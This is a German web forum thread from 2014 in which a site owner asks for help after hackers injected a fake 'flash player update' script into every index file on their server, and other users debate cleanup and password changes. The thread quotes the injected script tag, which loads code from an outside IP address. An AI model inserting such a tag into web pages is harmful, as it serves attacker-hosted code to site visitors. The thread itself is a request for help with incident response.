Autor |
Nachricht |
Abenaa
Threadersteller
Dabei seit: 30.06.2008
Ort: Sachsen
Alter: -
Geschlecht:
|
Verfasst Mi 22.10.2014 14:49
Titel Websites gehackt |
|
|
Es ist nun schon zum zweiten Mal, dass unsere Webseiten gehackt wurden. Auf diesem Webserver befinden sich zwei Seiten mit zwei verschiedenen CMS. Ich wollte einmal nachfragen, ob vielleicht jemand diesen Hack kennt? Es handelt sich um einen "A flash player update is required to view this content hack". Folgendes Javascript wird in sämtliche index-Dateien, nicht nur PHP auch HTML eingeschleust:
Code: | <script src="http://23.254.131.54/script.php"></script> |
Wenn die jeweilige Seite dann aufgerufen wird, erscheint nur noch unten stehende Meldung. Kennt jemand diesen Hack und wie man dieser Sache Herr werden könnte? Vielen Dank im Voraus.
Es wurden bereits alle Passwörter für alle Zugänge, auch FTP, geändert.
Zuletzt bearbeitet von Abenaa am Mi 22.10.2014 14:50, insgesamt 1-mal bearbeitet
|
|
|
|
|
Mac
Dabei seit: 26.08.2005
Ort: Köln
Alter: 62
Geschlecht:
|
Verfasst Do 23.10.2014 07:13
Titel
|
|
|
cms updaten, bestehende daten auf schadcode scannen. unbekanntes löschen.
|
|
|
|
|
Anzeige
|
|
|
remote
Dabei seit: 10.11.2006
Ort: /var/www/
Alter: 109
Geschlecht:
|
Verfasst Do 23.10.2014 10:11
Titel
|
|
|
a) server wegschmeissen und neu aufsetzen.
oder
b) jemanden bezahlen der in der lage ist einen gründlichen audit von code, datenbank und system durchzuführen.
und
c) in zukunft jemanden bezahlen der eure systeme wartet und sicher hält
nach einem hack passwörter zu ändern ist relativ witzlos.
ihr könnt davon ausgehen, dass bereits backdoors platziert wurden über die der/die angreifer beliebigen code auf eurem system ausführen können. wenn ihr glück habt und das system gut konfiguriert war, ist der befall wenigstens nur auf den webserver begrenzt. sicher sein kann man sich da aber auch nicht.
da ihr schon zum zweiten mal oper eines hacks seid, fehlt es offenbar an der befähigung eure webseiten sicher zu betreiben.
tut dem restlichen internet einen gefallen und lasst das jemanden für euch machen der es kann.
|
|
|
|
|
Abenaa
Threadersteller
Dabei seit: 30.06.2008
Ort: Sachsen
Alter: -
Geschlecht:
|
Verfasst Do 23.10.2014 14:12
Titel
|
|
|
Ich weiß nicht, ob Strato einfach so den Server wegschmeißt
Danke für die Antwort. Ich werde Deinen Rat befolgen und all das, was mich nichts angeht, in andere Hände geben.
|
|
|
|
|
pantonine
Dabei seit: 03.03.2011
Ort: gehen Sie bitte weiter…
Alter: -
Geschlecht: -
|
Verfasst Do 23.10.2014 19:57
Titel
|
|
|
Zitat: | nach einem hack passwörter zu ändern ist relativ witzlos. | Bei allem Respekt, aber: Nach einem Hack Passwörter nicht zu ändern, ist relativ verantwortungslos.
|
|
|
|
|
remote
Dabei seit: 10.11.2006
Ort: /var/www/
Alter: 109
Geschlecht:
|
Verfasst Do 23.10.2014 20:04
Titel
|
|
|
pantonine hat geschrieben: | Zitat: | nach einem hack passwörter zu ändern ist relativ witzlos. | Bei allem Respekt, aber: Nach einem Hack Passwörter nicht zu ändern, ist relativ verantwortungslos. |
nach eine hack passwörter zu ändern ist relativ witzlos, wenn man nicht auch einen gründlichen audit macht um auszuschliessen, dass backdoors im system verbleiben oder die neuen passwörter gleich wieder abgefischt werden. die schlösser an der tür austauschen ist witzlos, wenn die tür aus den angeln gehoben wurde.
happy?
|
|
|
|
|
pantonine
Dabei seit: 03.03.2011
Ort: gehen Sie bitte weiter…
Alter: -
Geschlecht: -
|
Verfasst Do 23.10.2014 20:23
Titel
|
|
|
Nö. Im Zweifel häng ich erstmal die Tür wieder ein. Sonst kommt nämlich jeder Depp rein.
|
|
|
|
|
remote
Dabei seit: 10.11.2006
Ort: /var/www/
Alter: 109
Geschlecht:
|
Verfasst Do 23.10.2014 20:24
Titel
|
|
|
pantonine hat geschrieben: | Nö. Im Zweifel häng ich erstmal die Tür wieder ein. Sonst kommt nämlich jeder Depp rein. |
mein reden.
ich glaub ich lass das mit den passenden analogien und setzte in zukunft wieder auf autovergleiche.
|
|
|
|
|
|
|
|
Ähnliche Themen |
[Info] Joomla-Seite gehackt, was tun?
Abwicklung von Störfällen bei Websites
Beste CMS für mehrsprachige Websites
"Blog" zum einbau in Websites
|
|